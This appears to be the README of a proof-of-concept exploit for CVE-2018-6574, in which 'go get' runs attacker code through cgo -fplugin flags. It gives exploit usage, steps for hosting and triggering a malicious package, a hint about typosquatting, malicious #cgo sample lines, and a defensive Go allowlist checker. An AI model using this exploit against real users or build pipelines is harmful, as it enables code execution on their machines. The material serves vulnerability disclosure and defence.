CVE-2018-6574 | go get RCE

Go before 1.8.7, Go 1.9.x before 1.9.4, and Go 1.10 pre-releases before Go 1.10rc2 allow "go get" remote command execution during source code build, by leveraging the gcc or clang plugin feature, because -fplugin= and -plugin= arguments were not blocked.

The attack cannot be triggered remotely by the attacker alone: a user, or an automated function, has to run go get against an attacker-controlled import path, and the payload then executes with that user's privileges while the fetched package is being built. Nothing beyond that single action is required. In practice the exposed targets are people and build pipelines that fetch arbitrary packages, which an attacker can reach through typosquatting of a popular import path or similar tricks.

Usage

Exploit

ruby cve-2018-6574_exploit.rb <PAYLOAD>

PoC

Adapt the PoC to your case and payload:

-> ruby cve-2018-6574_exploit.rb "touch /tmp/owned"
[1] Upload 'go-get-rce' folder to github
[2] try: go get github.com/[username]/go-get-rce
  • Replace the touch /tmp/owned payload with your own.
  • A directory called go-get-rce is created; it contains a Go package and the malicious compiler plugin that the package's cgo flags load at build time.
  • Upload the go-get-rce directory to GitHub or any other remote host.
  • From the vulnerable function (or any Go toolchain older than the fixed versions above) execute go get github.com/[username]/go-get-rce. Note that go get takes an import path, not a URL with a scheme.
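Where the flags come from, and what the fix in Go 1.9.4 / 1.8.7 started checking, as an added example that is not part of this repository or of Go itself. When go get builds a package that imports "C", every #cgo CFLAGS/LDFLAGS line is passed straight to gcc or clang; -fplugin=x.so makes the compiler dlopen x.so, and -Wl,-plugin=x.so does the same through the linker, so attacker code runs before any Go code is even compiled. Go's fix rejects flags that are not on an allowlist. The checker below reproduces that idea on two constructed Go source files (one shaped like the package this PoC generates, one benign); the allowlist in flagAllowed is a deliberately short one written for this example, not the list Go ships.

```go
package main

import (
	"bufio"
	"fmt"
	"regexp"
	"strings"
)

// Constructed sample (not the repository's generated package) of the cgo
// preamble shape that CVE-2018-6574 abuses: the flags on the #cgo lines are
// handed to gcc/clang when `go get` builds the package, and -fplugin= /
// -Wl,-plugin= make the compiler or linker dlopen an attacker-supplied .so.
const maliciousSource = `package main

/*
#cgo CFLAGS: -fplugin=./plugin.so
#cgo LDFLAGS: -Wl,-plugin=./plugin.so
#include <stdlib.h>
*/
import "C"

func main() {}
`

// Constructed benign package: only include paths, defines, warnings and libraries.
const benignSource = `package main

/*
#cgo CFLAGS: -I/usr/include -DDEBUG=1 -O2 -Wall
#cgo LDFLAGS: -L/usr/lib -lm
*/
import "C"

func main() {}
`

// cgoDirective matches "#cgo [build-constraint] VAR: flags" lines.
var cgoDirective = regexp.MustCompile(
	`^\s*#cgo\s+(?:[\w,!]+\s+)?(CFLAGS|CPPFLAGS|CXXFLAGS|FFLAGS|LDFLAGS):\s*(.*)$`)

// flagAllowed is a deliberately small allowlist written for this example; it
// is not the list Go 1.9.4 shipped, but follows the same idea: accept a few
// well-understood shapes and reject everything else, including -fplugin=,
// -plugin=, and the -Wl,/-Wa,/-Wp, pass-throughs that smuggle flags to the
// linker, assembler or preprocessor.
func flagAllowed(f string) bool {
	switch f {
	case "-g", "-O", "-O0", "-O1", "-O2", "-O3", "-Os", "-fPIC", "-pthread":
		return true
	}
	switch {
	case strings.HasPrefix(f, "-W"):
		// -Wall, -Werror, -Wno-unused are fine; a comma means a "-Wl,..."
		// style pass-through, which is how -plugin= reaches the linker.
		return !strings.Contains(f, ",")
	case strings.HasPrefix(f, "-I"), strings.HasPrefix(f, "-D"),
		strings.HasPrefix(f, "-L"), strings.HasPrefix(f, "-l"),
		strings.HasPrefix(f, "-std="):
		return true
	}
	return false
}

// unsafeCgoFlags scans a Go source file for #cgo directives and returns every
// flag outside the allowlist as "VAR: flag". For brevity it checks every line
// rather than only the comment immediately preceding import "C", which is the
// only place cgo actually honours the directives.
func unsafeCgoFlags(src string) []string {
	var bad []string
	sc := bufio.NewScanner(strings.NewReader(src))
	for sc.Scan() {
		m := cgoDirective.FindStringSubmatch(sc.Text())
		if m == nil {
			continue
		}
		for _, f := range strings.Fields(m[2]) {
			if !flagAllowed(f) {
				bad = append(bad, m[1]+": "+f)
			}
		}
	}
	return bad
}

func main() {
	fmt.Println("malicious:", unsafeCgoFlags(maliciousSource))
	fmt.Println("benign:   ", unsafeCgoFlags(benignSource))
}
```

Run it with go run on any Go version; it only inspects text and never builds the samples. The point to take away is that a vendored or fetched package needs the same review as a build script: a single #cgo line decides what the compiler loads, so on a patched toolchain the equivalent of this check runs before gcc or clang is ever invoked.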

References